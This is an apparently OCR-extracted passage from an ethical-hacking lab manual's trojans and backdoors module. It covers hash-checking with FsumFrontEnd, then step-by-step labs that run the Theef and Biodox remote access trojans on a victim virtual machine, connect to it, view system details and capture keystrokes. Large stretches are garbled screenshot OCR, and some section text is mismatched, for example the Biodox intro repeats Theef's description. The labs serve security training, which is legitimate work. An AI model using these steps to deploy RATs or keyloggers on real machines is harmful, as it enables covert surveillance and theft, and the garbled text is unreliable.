! . . J.; hava 1256(4) l_h»vjl256(5) (✓ m d *.| n rip«mdl28 T 1rlpemdlftO □ ripemd250 C ripemd320 C ‫ מ‬hash 0 sdbm f l shaO D >h«1 □ »ha2 (224) C sha2 (256) C 3h«2 (384) 1 1*1 2 (5 1 2 ) n si:c64 f 1sncfru2128(41 T 1snefm’ 128 (81 r snefru2 256 W r = snefru22S6f8> v 4‫ |־--י‬About Mash: F ie ^ m Co ^ 0 a | U kQ Encoding: | Base 16 (hexadecimal) v □ hw ac [< C Wb tt h :.'/ u>« j‫<׳‬r r n ! I e o ttp fs r »to «o3* e C E H La b M anual Page 484 E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited. ‫46-0״‬
  • 62. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs FIGURE 8 6 FsumFrontEndcheckingm 5 .3 : d. 37. Select a tile by clicking die F ile browse bottom from die desktop. That is Test.txt. Fsum Frontcnd v1.5.5.1 FsumFrontend Q Tools □ Methods (1 /9 6 ) 0 -L 2 Co It j ate t«1Ik Q H ave Autoruns au to m atically execute an Internet search in your brow ser by selectin g Search O nline in the Entry menu I- 5 ne c □ havaL24 (J) □ hava!224 (4) □ haval224 (S) C haval256(3) | □ /hash □ jshash □ md? G md4 B md5 O pM wr? □ pj"32 : hava!2S6 (4) Q ] hav3 2S0 (5) G ripemdl&O E" 1ipcmd256 E" ripcmd320 I I1 sha>1 > (~1 shaO Q shal □ sha2 (224) Q sha2 (256) □ sha2(3&4) n « k a 2 CS12I Generare chec* □ ripcmdl28 risd m b :•■S3 Verify chccksur gH Optiors in tl7e6d IH snefru2 128(4) I I snefru2 128 (8) I snefru2 256 14) I snefru2 256II ■ ?| About : J Hash: F ie | Encoding: |Base 16 [hexadecimal) v j O HMAC =3 B , Website httpi.'/fiumfesourcerorge-ne: FIGURE 8 7 FsumFrontEnd file b w .3 : ro se. & Autoruns displays the text "(N o t verified )" next to the com pany nam e of an im age that eith er does not have a signature or has a signature th at is not signed by a ce rtifica te root authority on the lis t of root authorities trusted by the system B--EZ Fsum Ficntcnd a - S Tools : b -ZH Calculate hashes □M ethods :96) 0 adler? ;-•G3 Fie :-2 3 Tec jQ Verify checfcsi »( ___o. Generate chec (~ladlerl6 □ *r 2 »e3 n ap hash |‫ |־־‬bdkr D (b u 1r.m p cg 2 [H «c8 □ crt16 □ ac16_ccitt ‫ ח‬crc16Jbm □ ac15_x25 0© '• : ‫נ‬ 1 0»genire ’ ■ Nev» folder Desktop J| Do*nlc«d« Ltoaries 3 Documents A- Computer Sycrem Folder SK Recent pieces Network System Folder J 1 Mudr Pictures 8 fe Videos flP Computer Local Disk (C:) <r Google Chiomc Shortcut Z31 KB Test Text Document 1 a Local Disk D) — a M071lla Firefox Shortcut 1.06 KB 0 ye bt s Local Disk [&) ‫! ־‬le nan‫־‬e: Test |a !I Files r . ‫־‬T 3 Website. http:Vfsumfc.50u‫׳‬ccfcrgc.‫*׳‬ct FIGURE 8 8 FsumFrontEnd fileo e . .3 : pn 38. C lick Add Folder to select a folder to be added to die hash, for example, D:CEH-Tools C E H La b M anual Page 485 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 63. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Fsum fro n te n d v1 .5.5.1 B 1 3 -‫ ׳‬Fsum Frontend |i) □ Tools i 1 1■ - I — I ‫ם‬ x ‫ ח‬M e th o d s (!/95: Cdk.jldte '1a il* ( J h«val224 (J) ‫׳ “ ־‬ J !•••^3 Tort K Verify checksur ! |k G*n«r*!« <h«ci: ]••■88 Options About [ J h«val224 (4) j j haval224 (5) H jh*«h Q J hiKh ‫ז‬ CD >nd^ npjv»32 n rip e m d l28 U haval256 (3) L havat25&(4) C h«val25$(5) [Z rnri4 rlpemdloO E ‫^*ייי‬ d panama P ripemd256 □ ripemd320 C ish a sh C sh a 2(2S 6) □ »dbm □»h aO □> h d 1 □ »ha2 (224) 1 ska2 (512) n»i2«64 1 1*ncfru2123 Ml I snefm2 128 f81 V snefru2 256 M ( I 384) 2««‫)נ‬ T snef1 2 254 f8> u v Cow pare Hash: F ie l)ACEH-T0clsCEHv3 Module 06 Trojans and BackdoorsNFiles and Folder Integrity ChedtciVsumfrontend1.5‫. _ |־‬ ^ |_ 0 1 Autoiuns prefixes the nam of anim s e age' publisher with "(Not verified)" if it cannot verify a digital signature for die file that's trusted by the system G fl Encoding: |Basc 16 (hcxadcdmal) v | [ J HMAC File < 1t e L o J V = W tbflte http:,'/fscmfecoj'c«ror9* m : 1 FIGURE 8 9 FsumFrontEndAdd Folder. .3 : Fsum Frontend v1.5.5.1 Fsum ficntend H-b2 Tools I B -t3 Cakuiatehashes j I id«t jI‫׳‬ d i Ta e ft] Verify checksumhies : 6ene £ -‫ ־‬checksumfi • ate Options 05 ••: | Methods <1/96! |gj!h h3 L 9- ‫ר‬ ^‫נ‬ ‫^ז׳‬ LI 9 *‫ז*י‬ _JhMl160(3) C_Kbv9II60(J} □ havall60(5) □ hav?C24(4) Q Qmd2 □ rip«fnd25€ □ hwal256 G) 5jmd5 Q e dZ iip m S Q (5) Cm u Hs «* F DC4T0 C ile t B-0IAE □rhs sah LlhailfiO □ hava!192(3) U havelVA (3) □ h«v«l192 (A) _| 2 | Koval1 8 (4) □ havall92[5) a85( ) jhs Daa 5(4 □hvl265 Q ah hvl26 ) □ panama □p 3 jw 2 □ ripemd128 [I!sdbm □sa hO [ ldaal Browse For Folder ‫־‬H I_h«v«n2ac5) Ch«r11224{3J Cjsh*5h C ripemd160 Cshi2 224) CekAu fotn-. . . '‫ז‬ed eG hcef m n d1 5 amj s r e 51 • ► “•“* - ‫י״‬ i ‫י‬ t A A m is to • d in tra r Compute‫־׳‬ A t fa Local D (C isk O «l D < ) isk D iL £3 A "Hide Signed Microsoft Entries" option helps you to zoomin on third-partyauto-starting im ages that have been add ed to your system I | CW«I 1 iL ._______ —— FIGURE 8 0 FsumFrontEndAddingFolder. .4 : 39. Respective tiles o f die selected folder w ill be listed 111 a list box. C E H La b M anual Page 486 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 64. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs II _ 2 Fsum Frontend v l.5.5.1 1 14■ Ftum fk >« d tn a U Tooii : m t J CakulatehaihM i : I«Bl (9J V» f, checksum1 c. 4 : an< th«cbum(4 rat« cJJ Options About 61 ‫! -ז‬u H | □M aihodb< /9 ( 1 6 □ haval*6 01 0 □ K v»LL4(4) a f~ ~l Qr^amd?* 141ft?(250 t& m ? ( > vaM 0 ) w 6 (4 r Saval2i4|S) ( k M m Lnpemdira 1 O 2(1«4> m Hath: File [ |haval160(3) ‫|־־‬haval2S60) v|«1d5 Qnh»«h l«ha?(512) t ►W192 (J) □hw«l2*(4) paiiama [julbm f wr(W □ havall92<4) □haval266<6) [” jpjw3J Q h ‫ ח‬mefru21 8 1 2 (4 1» 0 1 |h*val192(5) ha.*1 2 (3 24 ) r)|h»h ~|»ha b | |np*mdl2fl nirmdlM [_|‫י*ייי‬ I 1nefru 1 8 1 2 (8 »«rfru225«M1 1 ■ 1 2 1 DtCEH-Too(>'CEH.3Module0 T c sand BackdoorsSFiles andFolder Integrity ChecUf(sumfrontend-1.S.S.lVitadme.ut 6 yan ■ j H :3 F 1 ‫■׳‬ _ y * f i LJ . Encoding: Ba.e 1 (hexadecim v] (~HMAC 6 al) Fie ^ D:QH-IochThumb* d b (810C£h- (sCEH LabPrere— k ■D'.CB+T clsCEH LabPrere‫־‬ . CH):aH-T0cl5CEH«e lab Prerc- 10 8 0 0 / 8 0 0 ‫ ז‬oc(sCEH/Slab Preret> F -TocisxCEH/S lab Prere_ C H jij D H :C 4-TocteC£ ( < LabPrere_ ! •€ S£ O:CEH-TocbCEH‫ •׳‬LabPrere— fejDACEH-TocttCB** LabPrere-. J^D '.CFH-TocbSCEH^ lab Pit rf— C£H-TochvClHv lab Prere_ | > ‫-ן‬j[> £ 3 11 <| 6 , J Log Vr.' h p »u «etoviHagp M y/1 m FIGURE 8 1 FsumFrontEnd fileslist. .4 : 40. C lick G enerate checksum files. The progress bar shows the progress percentage com plete for the hash hies generated. Fsum Frortend v1.5.5.1 Fsumfrontend a L i Tools : H 1Cakuiatehashes I j 23‫ ־‬Ted ‫ה‬M ok1 6 r d( 9‫)׳‬ ih ]hawaT60G) II (‫| ־‬K^^t224«4» I fep Verify checksum1 es 4 : £ Generate checksumfi Options About -1 U 1» _]np«m«£i6 14*2(256) [ h*‫׳‬all«0t4) [‫־־‬ (5) hvm ati r‫«״‬ l~ 1«p 32 ernd 0 I *»2G S4) □hvll6( ) aa 05 □hv S(3 ‫.״‬l26 ) 3*d n S Qrehsdi ‫252 *ח‬ 0) 1( T p-‫״״״‬ □hv19( ) C aa 9 [ ) a*124 ]hvl125 □hvl26 ) aa S (S I |n d128 pem □p * jw 2 !‫ *־‬dbm r lsoc6» Q*h»0 [!***2C224J 5ncfru21 28f41 I Isnefru2 1 8(8) 2 ?nrfru2 256fi Clwval 192)5 ( )H haval2S6 )4( U “1 * • □ K* 41224 31 0 ** ‫יי‬ » ^ nprmdlfcO Hs | ah File Q Autoruns w ill display a dialog w ith a button that enables you to re• launch Autoruns w ith adm inistrative rights D:CEH-Tools'CEH.3f.lcdue06Trcjans ard Backdcois'sRIes andFolder Integrity Checkerfsum frontend-1.53.1readm e4tt > 1 F| | [■y Ecdg Bs 1( eaeim ~] □MC 3 ?» noin: ae6hxdc a v H A l) Fie [hCB‫־‬MocHvThum*>vdb (SPD.CtM-ToohCtH^ LabPrere0■D‘.CEHToclsCEH/S LabPrert_ ‫־‬ O D:CtH-TooHCtHveLabPrgrgI0D ‫־‬ .OH-IocHXCEH* LabPiwu. ^ 0:CfH.Too»5SCfHv« lab Prert_ DCIH 1ee!*vC(M/fl lab Prcrc‫״‬ E0ClH-Ioo<iCIH4 LabP‫׳‬v«_ #)DACB4 ToobC& ‫ ״‬LabPrtrt+« £ DCfH ToohCFH*« lab Prcre_ |4JDCtM-1 0ehC!Hw6lab Pr»r»... FIGURE 8 2 FsumFiontEndGeneratech .4 : ecksu files. m C E H La b M anual Page 487 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 65. 1 X J Fsum Frontend * 27% ‫ם‬ 1 M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Ku‫׳‬n fantcnd Ir a • . Took 1 W C«kul4l*hMh«1 1 N ■ ‫״‬ ‫ ־‬iMalhodbtWKt ltwH6O0) I twval1«>(4) lhavaH60(5) [ h*‫׳‬aM92(J) □ h«v«H92(4) 4)224)• ^ ‫) ר‬ r *W V4224 IS) r 1 h«v#l S> J> ‫־‬ t< r |4 ) [ im m iw im □ h.v.l S (S) [_ *pemdl« shM? 064) _J« h ‫״‬h l*w?(S1?) ; (9.J Vwif, Lhw.Uun.t4c, ~ }m d / ‫•-׳‬jj 6«nwj:«th*ckium1i □ I I 1 S* ;••cli Option* 1 ••^Abool File 2 C v a .V . L r Wfis |h«val1M fS) n !h «h — |nprmdl28 □ ihnO |«h Wffru212«(41 Iinf#ru () * 1 21? 8 8 h# 2 3) v«!2 4 ‫״‬Jilh « h liprmdlM 2 2 W#ru K M tv j.- .Ctiklop'Tet.til Encoding: Ba.e 1 <hewdicim.il) v □ 6 O You can also use the e com and-line option to m launch initially launch Autoruns with administrative rights 26 File D EM oc v :C -1 Thuubvdb I^D.CfcH-ToctsvCEH/* LabPrtfS■ D :CB+Toc!sCB+<eLabPrereSHttOH-T c» CEH*labPrerc_ :1 05 53 D '.CfcH octsC£H/SLib Preffc_ -1 D EH AC -Toc*sC &+/* LabPrcre_ ji, D:CB4-TockC£R.« LabPrrrr_ D EH oc(sC£Hv6 L«bPrere— :C -T hmac | ‫׳‬nd5 B1 B 2 9 6 0 8 ... C F5 0 482 9 ‫״‬ 4C029WFJ40E83IC‫״‬ 0 782DC31 D2 C 2 FF2C ... 3 85 9 ... B A 6A C 3 0 0 A 7 1 2 9 3 2 BA FM 7 | 7 3 5 E7 7 4 C 6 A S1 7 6 A £)DA<B4-Too&CB*« LabPrere- E ECEDSA... ^I>CFH-Toc^CFH-eHbPrerc_ 08*2202- 3 < 8 - j- , Log Re m dS: 0 C:'U»*SAdmin««rjw< «ktopTestt«t D eCDS»0CKGa13®09OGICFW2r£ 41D 1 Extcuton: (X O fcO C I k C OO Rc II < 1 ft'CEH-Too•?‘Thunb^.d b 1p, ‫׳‬llurri'f lOU'tffcXgF FIGURE 8 3 FsumFrontEndp g ofh files. .4 : ro ress ash 41. The follow ing is die list o f 1 11d5 tiles after com pletion. & CEH-Tools are also located mapped N etw ork D rive (Z :) of V irtual M achines FIGURE 8 4 FsumFrontEndlist ofh shfiles. .4 : a L a b A n a ly s is Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and free inform ation. C E H La b M anual Page 488 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 66. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S R E L A T E D T O T H I S LAB. Q u e s t io n s 1. Scenario: A lice wants to use T C P V iew to keep an eye 011 external connections. H ow ever, sometimes there are large numbers o f connections w ith a Rem ote Address o f "lo calh o st:# # # # ". These entnes do not tell A lice anything o f interest, and the large quantity o f entnes caused useful entries to be pushed out o f view . 2. Is there any w ay to filter out the "lo calh o st:# # # # " Rem ote Address entries? 3. Evaluate w hat are the other details displayed by “ autoruns” and analyze the w orking o f autonins tool. 4. Evaluate the other options o f Jv l6 Pow er T oo l and analyze the result. 5. Evaluate and list die algoriduns diat Fsum FrontEnd supports. In te rn e t C o n n ectio n R e q u ire d □ Y es 0 No P la tfo rm Su p p o rted 0 C lassro o m C E H La b M anual Page 489 0 iLabs E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 67. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs C r e a tin g a S e r v e r U s in g t h e T h e e f T b e e f is a W in d m i s- b a se d a p p lic a tio n fo r b o th th e c lie n t a n d s e rv e r en d . T h e T h e e f s e rv e r is a v iru s th a t y o n in s ta ll on y o u r v ic tim 's co m p u te r, a n d th e T h e e f c lie n t in n h a ty o u th e n u se to c o n tro l th e v im s . I CON KEY / V a lu a b le ' in fo r m a tio n S T est yo u r k n o w l e d g e ____________ * W e b e x e rc is e L a b S c e n a r io A backdoor T rojan provides rem ote, usually surreptitious, access to affected systems. A backdoor T rojan m ay be used to conduct distributed denial-ofservice (D D o S) attacks, 01‫ ־‬it m ay be used to in stall additional Trojans 01‫ ־‬other form s o f m alicious softw are. F o r exam ple, a backdoor T rojan m ay be used to in stall a dow nloader 01‫ ־‬dropper Trojan, w hich m ay 111 turn in stall a proxy T rojan used to relay spam 01‫ ־‬a kevlogger T rojan, w hich m onitors and sends £ Q ! W o r k b o o k r e v ie w keystrokes to rem ote attackers. A backdoor T rojan m ay also open ports 011 the affected system and thus potentially lead to further com prom ise by other attackers. Y o u are a security adm inistrator o f your com pany, and your job responsibilities include protecting the netw ork from Trojans and backdoors, T rojan attacks, stealing valuable data from the netw ork, and identity theft. L a b O b je c t iv e s T lie objective o f tins lab is to help students learn to detect T rojan and backdoor attacks. J T Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors The objectives o f the lab include: ■ Creating a server and testing the netw ork for attack ■ D etecting Trojans and backdoors ■ A ttacking a netw ork using sample Trojans and docum enting all vulnerabilities and flaws detected L a b E n v ir o n m e n t To carry tins out, you need: ■ C E H La b M anual Page 490 T h eef tool located at D:CEH-T00 lsC EH v 8 M odule 06 T rojan s and BackdoorsTrojans TypesRem ote A cce ss T ro jan s (RA T)Theef E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 68. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs ■ A com puter running W indow s Server 2012 as host machine ■ A com puter running W indow Server 8 V irtu al M achine (Attacker) ■ W indow s Server 2008 running 111 V irtual M achine (Victim ) ■ A w eb browser w ith In tern et access ■ Adm inistrative privileges to nm tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program that contains m alicio u s or harm ful code inside apparently harmless programming or data in such a way that it can get co n tro l and cause damage, such as ruining die file allocation table on a hard drive. Note: The versions o f die created client or host and appearance o f die website may differ from what it is 111 die lab, but die actual process o f creating the server and die client is same as shown 111 diis lab. Lab T ask s TASK 1 1. Launch W indow s Server 2008 V irtual M achine and navigate to Z:CEHToolsCEHv8 M odule 06 Trojans and BackdoorsTrojans TypesRem ote A ccess Trojans (RAT)Theef. 2. M Double-click Server210.exe to run die Trojan on the victim ’s machine. C reate Server w ith Pro Rat jija * T‫׳‬ojans T /oes » denote Ac:e5s ‫־‬roiars (RAT) » Theef L °‫ז‬ *° I-I Date m iiied cK 1-1 Type M Sire H I 0 .C O O ararr.n B O*ot?lO Ed acrvcr210 e>e I pass e j readn-e.txt ciders v P|B9B9EBB 1 !■3upx.exe Cemnond Shell ~ r w * I ^ JA Defacenent 'ro ja rs ^ D estruave T'oians | . Ebsnong Trojans J i E-Mal T'ojans F P T r o ja r £ GLlITro;ars 1 ‫־‬rrTFH‫־‬T P S ‫ ־‬r0)ars i t ICMP Bcddoor ^ MAC OS X Trojans ^ Proxy Serer Trojan: Remote Access “ rtge Apocalypse ^ Atelie‫ ׳‬web Renr>1 k). DarkCorretRAT __ ^ ProRst Theef FIGURE 8 :WindowsServer2 0 - h efFolder .1 0 8Te 3. 1 1 the Open F ile - Secu rity W arning w indow, click Run, as shown in die 1 follow ing screenshot. C E H La b M anual Page 491 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 69. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Open File -Security Warning The publisher could not be verified Are you sure you want to run this software? ...emote Access Trojans (RAT)TheefServer210.exe Name I] U n kno w n P u b lish e r Publisher Type Application From Z:CEHv8 Module 0 6 Trojans and BackdoorsTrojan... Run Cancel This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run ‫ל‬ 't FIGURE 8 :WindowsServer 2 0 - iityWarning .2 0 8 Secu 4. Launch W indow s 8 V irtual M achine and navigate to Z:CEHv8 M odule 06 Trojans and BackdoorsTrojans TypesRem ote A ccess Trojans (RAT)Theef. 5. Double-click Client210.exe to access the victim machine remotely. |P . T T ” q | ‫«־־‬ Applicator took 1 Home ‫־ 8־‬ Share ‫״‬ View Trcjans Types ► Remote Access Trojans (RAT) ► Theef £ Downloads ^ | (j | | Search Theef © fi | Cl crt2'0.exe j iflj Ecitserer21 C.exe pcss.dll Recent places | 39Libraries v v | £ ccipara-n.ni Favorites ■ Desktop Theef Manage readmetxt " Scanner.dll ‫«׳‬ [1 Documents J '‫ ׳‬Music ■ Sever210.ex6 m Pictures <6 zip.dl ■J upx.exe | j Videos Homegroup 1 f f Computer timLocal Disk (C:) V CEH Tools (10.0.0. Network 9 items 1 item selected S22 KB FIGURE 8 :Windows 8 R n in C t2 0 e .3 - u n g lien 1 .ex 6. 1 1 the Open F ile - Secu rity W arning w indow , click Run, as shown 111 die 1 follow ing screenshot. C E H La b M anual Page 492 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 70. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Open File -Security Warning Th e publisher could not be verified. A re you sure you w ant to run this software? S3 Name: ...pesRemote Access Trojans (RAT)TheefClient210.exe Publisher U n kn ow n Publisher Type Application From: Z:CEHv8Module06Trojansand BackdoorsNTrojans T... Run Cancel This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. H wc nI d ew at so a to ru ? o a ecid h ftw re n FIGURE 8 : W .4 indows 8 Secu W - rity arning 7. The maui w indow o f Th eef appears, as shown 111 die follow ing screenshot. ‫ ׳‬n e e tv ^ iu 1^ 0‫־‬ C onnect ■ > ‫׳‬ C onnect A Port 6703 FTP 2968 D isco n n ect ☆ T h e e f version 2.10 01/N o‫׳.׳‬em ber/2004 FIGURE 8 :TheefMainScreen .5 8. En ter an IP address 111 the IP held, and leave die Port and FTP tields as dieir defaults. 9. C E H La b M anual Page 493 1 1 diis lab we are attacking W indow s Server 2008 (10.0.0.13). Click 1 C onnect after entering die IP address o f W indow s Server 2008. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 71. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs T T 7T ie e f v 2 10 C onnect Port C onnect 670 3 FTP 2 968 D isco n n ect A C omputer inform ation FIGURE 8 :TheefC .6 onnectingtoVictimM achine 10. N ow ill W indow s 8 you have access to view the W indow s Server 2008 machine rem otely. ro -h e e fv .2 .1 0 C onnect 10.0.0.13 - C onnect Port 6 703 FTP 2 968 D isco n n ect [15:05:31] A ttem pting co nnection w ith 10.0.0.13 [15:05:31] C onnection esta b lish ed w ith 10.0.0.13 [15:05:31] C onnection a cce p te d [15:05:31] C onnected to tra n s fe r port A % •Qj SY & C onnected to s e rv e r FIGURE 8 :TheefGaineda ssofVictimM .7 cce achine 11. T o view die com puter inform ation, click die Com puter icon at die bottom o f die window. 12. 1 1 Com puter Inform ation, you are able to view PC D etails. O S Info, Home, 1 and N etw ork by clicking on die respective buttons. C E H La b M anual Page 494 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 72. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs C om puter Inform ation Reply PCDetails re ceive d FIGURE 8 : TheefCom .8 pute! Inform ation 13. C lick die Spy icon to capture screens, keyloggers, etc. o f the victim ’s machine. p r TTieef v.2.10 C om puter Inform ation U ser name: A d m in is tra to r C om puter name: WIN-EGBHISG14L0 R egistered organisation: M ic ro s o ft R egistered o w n e r: M ic ro s o ft W o rkg rou p : [U n kno w n ] A va ila b le mem ory: 565 Mb o f 1022 Mb P ro cesso r: G enuinelntel In te 6 4 Family 6 Model 42 S tepping 7 (3 09 5 M hz) D isplay res: 800 x 600 Printer: [U n kno w n ] Hard drive s: C: (6,186 Mb o f 16,381 Mb fre e ) PC Details <#] OS Info ^5 Home N e tw o rk FIGURE 8 :TheefSpy .9 14. Select Keylogger to record the keystrokes o l die victim . 15. 1 1 the Keylogger window, click die Play button to record the keystrokes. 1 C E H La b M anual Page 495 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 73. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Keylogger [Started] cv ‫־‬j * FIGURE 8 : TheefKeyloggei Window .9 16. N ow go to W indow s Server 2008 and type some text 111 Notepad to record die keystrokes. Keylogger [Started] [New Text Document.txt - Notepad] HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the world famouse {BACKSPACE} hacker.j[CTRL}{CTRL}{ALT} *51 tv < ? © FIGURE 8 0 TheefrecordedKey Strokes .1 : 17. Sim ilarly, you can access die details o f die victim ’s machine by clicking die respective icons. L a b A n a ly s is Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posuire and exposure dirough public and free inform ation. C E H La b M anual Page 496 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 74. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S R E L A T E D T O T H I S LAB. T o o l/ U tility In fo rm a tio n C o lle c te d / O b je ctive s A ch ie ve d O u tp u t: Theef V ictim s m achine PC Inform ation V ictim s m achine keystorkes Q u e s t io n s 1. Is there any way to iilter out the "localhost:# # # # " remote address entries? 2. Evaluate the other details displayed by “ autoruns” and analyze the working o f the autonins tool. In te rn e t C o n n ectio n R e q u ire d □ Y es 0 No P la tfo rm Su p p o rted 0 C lassro om C E H La b M anual Page 497 0 !Labs E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 75. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs C r e a tin g a S e r v e r U s in g t h e B io d o x T h e e f is a W in d o w s b n sed a p p lic a tio n fo r b o th th e c lie n t a n d s e rv e r en d . T h e T h e e f s e rv e r is a v im s th a t y o n in s ta ll on y o u r v ic tim s co m p u ter, a n d th e T h e e f c lie n t in n h a t y o n th e n u se to c o n tro l th e v iru s . I CON KEY / V a lu a b le ' in fo r m a tio n T est yo u r L a b S c e n a r io Y o u are a security adm inistrator o f your com pany, and your job responsibilities include protecting die netw ork from Trojans and backdoors, T rojan attacks, theft o f valuable data from the netw ork, and identity theft. k n o w le d g e — W e b e x e rc is e L a b O b je c t iv e s ca W o r k b o o k r e v ie w The objective o f tins lab is to help students learn to detect T rojan and backdoor attacks. The objectives o f the lab include: ‫י‬ ‫י‬ D etecting Trojans and backdoors ■ & Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors Creating a server and testing the netw ork tor attack A ttacking a netw ork using sample Trojans and docum enting all vulnerabilities and flaw s detected L a b E n v ir o n m e n t To earn‫ ״‬tins out, you need: Biodox tool located at D:CEH-ToolsCEHv8 M odule 06 T ro jan s and BackdoorsTrojans TypesG UI TrojansBiodox Trojan ■ A com puter running W indow s Server 2012 as H ost M achine ‫י‬ A com puter running W indow Server 8 V irtual M achine (Attacker) ‫י‬ W indow s Server 2008 running 111 V irtual M achine (Victim ) ‫י‬ A w eb browser w ith In tern et access ‫י‬ C E H La b M anual Page 498 ■ Adm inistrative privileges to m n tools E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 76. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs L a b D u r a t io n Tune: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program that contains m alicio u s or harm ful code inside apparently harmless programming or data 111 such a w ay that it can get co ntro l and cause damage, such as ruining die file allocation table on a hard dnve. Note: The versions o f die created client or host and appearance o f die website may d ille r from w hat it is 111 die lab, but die actual process o f creating die server and die client is same as shown 111 diis lab. Lab T ask s 1 1. C reate Server w ith ProRat Launch W indow s 8 V irtual M achine and navigate to Z:CEHv8 M odule 06 Trojans and BackdoorsTrojans TypesGUI TrojansBiodox Trojan. 2. Double-click BIO D O X O E Edition .exe to m il die Trojan on die victim ’s machine. m TASK r w ‫'־‬ I 1 Home 0 *) t Vievr B io d o x Manage « ‫ , ,־,ז‬nsTypcs v| C, | ► GUITrojans ► Bo cox Tiojen ► Biodox | Search Biodox v© *. Jl. Language Favorites W Applicator took Shaic Pbgns Desktop £ Downloads ; 3 BI3COX CE Edrtion.e<e] ' Leeme Recent places & MSCOMCTL.OCX j * MSW1NSOCOCX 3 9 Libraries H ) Document? Music B A res.qf g sewings.ini Pictures |§ j Videos FIGURE 9 :Windows 8- d xContents .1 Bio o 3. 11 the Open F ile - Secu rity W arning window, click Run, as shown in 1 follow ing screenshot. Open File ‫ ־‬Security Warning Th e publisher could not be verified. A re you sure you w ant to run this software? N m : ...I T ja sB d x ro B d x IO O O Ed n x a e ro n io o T jan io o B D X E itio .e e Publisher Un kn ow n Publisher T e Ap yp : p licatio n F m Z E v8M u 0 T ja sa dB ck o rsT ja sT ro : :C H od le 6 ro n n a d o ro n ... Rn u Cn l a ce T isfile d e n t h veavalid d sig a rethatverifies its h os o a igital n tu p b e Y ush u onlyru so a fro p b e yo tru u lish r. o o ld n ftw re m u lish rs u st. H wc nI d ew at so a to ru ? o a ecid h ftw re n FIGURE 9 :Windows 8 Secu Warning .2 - rity C E H La b M anual Page 499 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 77. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs 4. Select yourpreferred language from die drop-down list 111 die Biodox main window: 111 diis lab we have selected English. B d xO e S u eE itio io o p n o rc d n £3commun A passwor manage keyboar msn sett O g settings________ 0 system information (5 fin manager 1 ; y commands f 1 capture server properties local tools |w contact us P oet Correction f f Cermet tkn ua> 6661 g Transfer Bs<r#*n 5 WebCam 6662 6663 6664 User Name Computer... Admin Coded By W ho! | w h o @ tikk ys o ft.c o m S t a t u s : R e a d y ... ----- -- FIGURE 9 :Windows 8 d m windowla g a eselectio .3 -Bio ox ain n ug n 5. N ow click die Server Editor button to build a server as shown 111 die follow ing screenshot. B d xO e S u eE itio io o p n o rc d n □.----- -Fake Error Message ‫־‬ 3 commenfcaton £ ‫ ־־־‬passwords manage files ‫ נ‬keyboard P msnsetbnos $ settings manage' O systenr nfb‫־‬matDn 3 ‫ יוד‬fu i manaoer g> commands p J capture ^ 5j server propprtiet local tools M contact us □ 0 0 ; Msg Title | Test Message | Message Icon : © r VictimNa Name: Connection; |61 66 ‫צג‬ | Saeen Capture; |6663 | Transfer:|666? | webcam Capture: |6664 | [‫ ־‬Connection Delay ‫־‬ connection QUvf^l c#<‫ .־‬for ronn^ftioi O Windowo -Regetry Sertnqs ‫־‬ K*y: mssrs: Correction *3 Connection S 